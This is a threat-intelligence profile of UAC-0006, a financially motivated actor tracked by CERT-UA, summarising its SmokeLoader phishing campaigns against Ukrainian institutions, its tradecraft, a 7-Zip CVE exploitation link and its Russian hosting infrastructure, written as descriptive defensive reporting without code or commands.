UAC-0006

UAC-0006 is a financially motivated threat actor tracked by CERT-UA and active since at least 2013. The group is closely associated with SmokeLoader and has repeatedly targeted Ukraine, including Ukrainian financial institutions and customers of PrivatBank. Reported activity includes phishing campaigns delivering SmokeLoader via password-protected archives, ZIP attachments, malicious VBS files, JavaScript, VBScript, LNK files, IMG files containing executables, and Microsoft Access .ACCDB documents with macros that launch PowerShell to download payloads. CERT-UA also reported campaigns in May 2024 distributing SmokeLoader, after which additional malware including TALESHOT and RMS was downloaded, with the botnet assessed to include several hundred infected computers. The actor’s operations are described as financially motivated, with CERT-UA warning of likely fraud involving remote banking systems. CERT-UA also states that at minimum UAC-0006 and UAC-0050 are involved in theft of funds from individuals and legal entities. In observed campaigns, UAC-0006 used compromised email accounts, invoice-themed and other business-themed phishing lures, and password-protected attachments to evade email security checks. Reported execution and post-compromise behavior includes PowerShell, process injection, use of legitimate system binaries, command-and-control communications, persistence via Run keys, firewall rule modification, and delivery of follow-on payloads. CERT-UA reporting also notes SmokeLoader variants capable of resolving current A records for configured domains via DNS queries. UAC-0006 has also been linked in reporting to exploitation of the 7-Zip vulnerability CVE-2025-0411 to deliver SmokeLoader against Ukrainian organizations. In that reporting, the campaign targeted Ukrainian government and private-sector entities and was assessed as likely cyber-espionage despite SmokeLoader’s long-standing use in financially motivated operations. Mentioned targets included Ukrainian state and financial institutions, major manufacturers, public services, and smaller local organizations that could serve as pivot points. Infrastructure and tradecraft directly mentioned in the content include use of Russian registrars such as reg.ru and nic.ru, Russian hosting including macloud.ru and cloudx.ru, and multiple .ru domains in SmokeLoader campaigns. One report states UAC-0006 TTPs overlap with FIN7, indicating possible ties to Russian APT activity, but the content does not establish that UAC-0006 is the same group as FIN7. Known related actor references in the content include UAC-0050 as another CERT-UA-tracked financially motivated group involved in theft activity. No additional confirmed aliases beyond UAC-0006 are provided in the content.